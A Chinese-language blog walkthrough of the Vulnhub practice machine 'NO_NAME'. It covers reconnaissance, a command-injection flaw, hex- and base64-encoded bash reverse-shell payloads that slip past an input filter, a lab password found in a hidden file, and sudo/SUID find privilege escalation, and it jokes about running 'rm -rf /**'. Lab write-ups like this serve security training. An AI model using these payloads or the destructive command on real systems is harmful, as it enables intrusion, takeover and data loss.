前言
- Vulnhub刷题简单记录
NO_NAME
描述
这是一台初学者级别的机器,获得外壳有点困难,只要想开箱即用即可获得外壳。一旦获得外壳,权限提升就很容易。
这台机器有3个标志。每个标志都存在于特定用户的主目录中。准备好测试您的 Linux 技能。
初级/中级
NO_NAME开始
1、可以用两种方法确认靶场的存在,扫ip
1 |
netdiscover -i eth0 -r 192.168.56.0/24 |
2、扫目标端口开发情况
1 |
nmap -sV -sC 192.168.56.109 -oA R |
3、访问主页,爆破目录,指定扫描php,这里用最大的字典,发现了superadmin.php
1 |
gobuster dir -u http://192.168.56.109 -w /usr/share/wordlists/dirb/big.txt -t 100 -x php |
4、在此目录发现了命令执行漏洞,通过cat查看源代码,发现过滤了一些字符,这里给出两种方法解决
1 |
|| cat superadmin.php |
方法一
①、首先将我们的反弹代码转换为16进制
②、利用xxd将其转换为ascii码字符,然后通过bash执行反弹成功,payload
1 |
echo "62617368202d6920263e2f6465762f7463702f3139322e3136382e35362e312f3132333420303e2631"|xxd -r -p|bash |
方法二
①、将其转换为base64
1 |
||echo "YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguNTYuMS8xMjM0IDA+JjEK" |base64 -d|bash |
拿到shell之后,在home目录中找到yash的flag,提示说有一个隐藏文件
这里我们就用find来寻找yash用户创建的文件,里面藏有密码
1 |
find / -name "*pass*" -type f -user yash 2>/dev/null |
找到了/usr/share/hidden/.passwd目录,发现了另一个用户的密码
1 |
haclabs:haclabs1234 |
5、提权,接着发现可以无密码执行find
简单的find提权
1 |
sudo find -exec /bin/bash \; |
提权方式二suid
1 |
find / -perm -u=s -type f 2>/dev/null |
直接用下面命令,记得要加-p才能成功,或者直接反弹shell也行
1 |
find sky -exec /bin/bash -p \; |
你如果闲的蛋疼也可以删除所有东西
1 |
rm -rf /** |
我的个人博客
孤桜懶契:http://gylq.gitee.io
FROM:gylq.gitee Author:孤桜懶契
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论